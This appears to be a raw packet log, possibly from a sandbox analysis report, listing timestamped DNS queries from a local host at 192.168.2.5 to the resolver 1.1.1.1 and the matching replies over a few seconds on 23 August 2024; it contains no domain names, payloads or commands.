Aug 23, 2024 18:43:27.943937063 CEST	55541	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.944366932 CEST	57559	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.945055962 CEST	53979	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.945105076 CEST	56384	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.945797920 CEST	56569	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.945872068 CEST	52080	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.946568012 CEST	57978	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.946871996 CEST	61710	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.947484970 CEST	64177	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.947844982 CEST	64703	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.948422909 CEST	53081	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.948548079 CEST	56617	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.949323893 CEST	62222	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.949336052 CEST	50885	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.949979067 CEST	65442	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.950545073 CEST	65128	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.950680017 CEST	53	60243	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.950701952 CEST	56808	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.950851917 CEST	53	55282	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.951370001 CEST	53	64443	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.951400042 CEST	56441	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.952564955 CEST	53	55398	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.954000950 CEST	53	64242	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.955862045 CEST	53	56569	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.955909014 CEST	53	57559	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.956187963 CEST	53	57978	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.957992077 CEST	58180	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.958065987 CEST	53	64703	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.958113909 CEST	53	61710	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.958545923 CEST	50743	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.958970070 CEST	58069	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.959295988 CEST	56347	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.959580898 CEST	53	56617	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.959592104 CEST	53	64177	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.959605932 CEST	61473	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.959959984 CEST	53	53081	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.960095882 CEST	52375	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.960422993 CEST	49717	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.960500956 CEST	53	56808	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.960551023 CEST	53	62222	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.960705996 CEST	63443	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.962457895 CEST	50589	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.962635994 CEST	53	56441	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.963648081 CEST	56525	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.964015007 CEST	54417	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.964327097 CEST	62850	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.964849949 CEST	63354	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.965249062 CEST	53910	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.965528965 CEST	61504	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.966301918 CEST	57073	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.966721058 CEST	59434	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.967428923 CEST	55817	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.967809916 CEST	54509	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.968156099 CEST	53	58180	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.968827009 CEST	65263	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.969337940 CEST	53	50743	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.969448090 CEST	53	56347	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.969647884 CEST	53039	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.970314026 CEST	64728	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.970662117 CEST	53	63443	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.970874071 CEST	56932	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.971225977 CEST	50611	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.971493959 CEST	53	52375	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.972223043 CEST	53	50589	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.972527981 CEST	61440	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.972745895 CEST	64417	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.973125935 CEST	64559	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.973403931 CEST	53160	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.974486113 CEST	62887	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.974877119 CEST	57901	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.975244999 CEST	65249	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.975521088 CEST	59704	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.975821018 CEST	53	55510	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.975946903 CEST	61283	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.976325035 CEST	53234	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.976516962 CEST	53	55541	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.976639986 CEST	54257	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.976769924 CEST	53	52080	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.976942062 CEST	58526	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.978209972 CEST	52258	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.978570938 CEST	53	59434	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.978627920 CEST	53431	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.978790045 CEST	53	65263	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.979038000 CEST	53	54509	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.979192972 CEST	49496	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.979576111 CEST	57338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:27.979939938 CEST	53	50885	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.980529070 CEST	53	53979	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.981623888 CEST	53	65442	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.982564926 CEST	53	56932	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.982573986 CEST	53	50611	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.982647896 CEST	53	65128	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.983014107 CEST	53	56384	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.983218908 CEST	53	64417	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.984220982 CEST	53	53160	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.985985994 CEST	53	59704	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.986479044 CEST	53	62887	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.986490011 CEST	53	65249	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.986711025 CEST	53	57901	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.987200975 CEST	53	61283	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.988579988 CEST	53	53234	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.989012003 CEST	53	53431	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.989161015 CEST	53	58526	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.990027905 CEST	53	58069	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.990744114 CEST	53	49717	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.995057106 CEST	53	62850	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.995382071 CEST	53	63354	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:27.999578953 CEST	53	55817	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.001148939 CEST	53	53039	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.002132893 CEST	53	64728	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.002681017 CEST	53	57073	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.005382061 CEST	53	64559	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.008888960 CEST	53	54257	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.010534048 CEST	53	61440	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.013151884 CEST	53	57338	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.017627954 CEST	53	49496	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.043961048 CEST	55390	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:28.076554060 CEST	53	55390	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.120083094 CEST	53	61473	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.123980999 CEST	53	54417	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.125847101 CEST	53	56525	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.130218983 CEST	53	53910	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.131917000 CEST	53	61504	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.276767969 CEST	53	52258	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:28.291472912 CEST	50172	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:28.623368025 CEST	53	50172	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.706053019 CEST	61109	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.706629992 CEST	63202	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.707161903 CEST	62379	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.707683086 CEST	49489	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.708098888 CEST	53904	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.708347082 CEST	61988	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.708395958 CEST	65517	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.708817959 CEST	50345	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.709062099 CEST	55017	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.709076881 CEST	58612	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.709750891 CEST	60660	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.709917068 CEST	51982	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.709990978 CEST	53807	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.710479975 CEST	59012	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.710949898 CEST	51716	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.710949898 CEST	59451	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.710949898 CEST	63291	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.711368084 CEST	59603	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.711617947 CEST	49440	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.711648941 CEST	56390	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.712127924 CEST	54800	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.712140083 CEST	50788	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.712549925 CEST	64384	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.712563992 CEST	58741	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.713049889 CEST	50027	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.713234901 CEST	63240	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.713293076 CEST	63683	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.713808060 CEST	50262	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714258909 CEST	50771	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714258909 CEST	59605	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714273930 CEST	64072	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714709997 CEST	49382	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714958906 CEST	59769	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.714993000 CEST	54093	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.715440035 CEST	54446	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.715668917 CEST	59036	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.715708971 CEST	55375	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.716224909 CEST	63498	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.716476917 CEST	62057	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.716536045 CEST	50359	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.716614008 CEST	53	61109	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.717016935 CEST	52967	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.717103004 CEST	53	63202	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.717245102 CEST	57863	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.717349052 CEST	53564	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.717700958 CEST	53	49489	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.717961073 CEST	58925	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.718139887 CEST	62522	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.718715906 CEST	53	50345	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.718797922 CEST	53	61988	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.719250917 CEST	53	55017	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.719747066 CEST	64498	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720196962 CEST	51774	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720196962 CEST	51505	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720453978 CEST	53	60660	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.720573902 CEST	56348	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720597982 CEST	65464	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720623970 CEST	53	58612	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.720768929 CEST	51898	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720825911 CEST	58084	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.720923901 CEST	50838	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721064091 CEST	54752	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721180916 CEST	56556	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721328020 CEST	51434	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721498013 CEST	56572	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721509933 CEST	50181	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721663952 CEST	55848	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721703053 CEST	62909	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721834898 CEST	59660	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721884966 CEST	61088	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.721915007 CEST	53	59451	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.722002983 CEST	56629	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.722074032 CEST	53	59603	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.722162962 CEST	64275	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.722193003 CEST	53	53807	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.722251892 CEST	53	63683	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.722625017 CEST	53	56390	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.723254919 CEST	53	50027	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.723483086 CEST	53	54800	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.725760937 CEST	53	50788	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.726412058 CEST	53	59036	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.726480007 CEST	53	57863	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.726675034 CEST	53	55375	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.727667093 CEST	53	52967	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.727868080 CEST	53	53564	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.730788946 CEST	53	51505	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.731102943 CEST	53	58084	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.731602907 CEST	53	62909	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.731770039 CEST	53	51434	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.732007980 CEST	53	56556	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.732147932 CEST	53	61088	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.732264042 CEST	53	65464	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.733098984 CEST	53	56629	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.733153105 CEST	53	64275	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.733676910 CEST	53	55848	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.734998941 CEST	53	50181	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.739207029 CEST	53	53904	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.740609884 CEST	53	65517	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.741439104 CEST	53	51982	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.743143082 CEST	53	62379	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.743707895 CEST	53	51716	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.743998051 CEST	53	49440	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.744051933 CEST	53	63291	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.744388103 CEST	53	50262	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.744472980 CEST	53	58741	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.744858027 CEST	53	63240	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.745789051 CEST	53	59605	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.745799065 CEST	53	64384	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.745806932 CEST	53	49382	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.745815992 CEST	53	54093	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.747164965 CEST	53	54446	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.747339010 CEST	53	50771	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.747582912 CEST	53	64072	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.750075102 CEST	53	58925	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.751315117 CEST	53	62522	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.751913071 CEST	53	64498	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.753123999 CEST	53	54752	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.753231049 CEST	53	50838	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.754549980 CEST	53	51898	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.756989002 CEST	53	59660	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.871268988 CEST	53	59012	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.875015974 CEST	53	56348	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.876198053 CEST	53	50359	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.882186890 CEST	53	63498	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.883219957 CEST	53	59769	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.883471012 CEST	53	62057	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.888191938 CEST	53	56572	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.892077923 CEST	53	51774	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.893743992 CEST	62357	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.894606113 CEST	57583	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.895234108 CEST	56388	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.895811081 CEST	52527	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.896352053 CEST	60607	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.896787882 CEST	60427	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.897115946 CEST	49152	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.897533894 CEST	63436	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.897614002 CEST	50209	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.898158073 CEST	50255	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.898308039 CEST	52102	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.898574114 CEST	61494	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.898940086 CEST	55243	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.899418116 CEST	62759	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.899431944 CEST	55870	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.899923086 CEST	64247	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.900331974 CEST	49600	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.900646925 CEST	55289	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.900794983 CEST	54976	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.901784897 CEST	50485	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.901969910 CEST	65285	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.903795958 CEST	54361	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.903872013 CEST	53	62357	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.905376911 CEST	53	56388	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.905721903 CEST	61708	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.905852079 CEST	59756	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.905951023 CEST	54758	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906124115 CEST	58007	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906183004 CEST	55871	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906335115 CEST	52059	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906487942 CEST	55732	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906554937 CEST	53	52527	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.906680107 CEST	55081	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906754017 CEST	59293	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.906909943 CEST	60652	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907007933 CEST	61284	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907073975 CEST	50067	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907208920 CEST	51451	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907291889 CEST	62513	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907428980 CEST	64175	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907599926 CEST	60421	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907824039 CEST	53	60607	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.907834053 CEST	62323	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.907900095 CEST	53	63436	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.907954931 CEST	50988	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.908039093 CEST	53	49152	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.908144951 CEST	57595	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.908610106 CEST	53	52102	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.908623934 CEST	64152	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.908773899 CEST	49490	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.908992052 CEST	51875	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.909048080 CEST	51250	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.909481049 CEST	63091	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.909677982 CEST	56770	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.909703016 CEST	50020	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.909871101 CEST	63955	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910010099 CEST	60694	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910089970 CEST	53	50255	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.910096884 CEST	56596	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910124063 CEST	53	55243	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.910157919 CEST	64857	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910177946 CEST	53	55870	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.910357952 CEST	53467	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910459042 CEST	54148	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910624027 CEST	49514	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910624027 CEST	60991	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910845041 CEST	54544	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.910996914 CEST	53	49600	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.911016941 CEST	55932	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.911060095 CEST	53	55289	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.911154985 CEST	63618	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.911210060 CEST	53	64247	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.911222935 CEST	51635	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.911611080 CEST	50580	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.911680937 CEST	53480	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.911822081 CEST	51790	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.912082911 CEST	62710	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:29.912230968 CEST	53	50485	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:29.912436008 CEST	53	54976	1.1.1.1	192.168.2.5
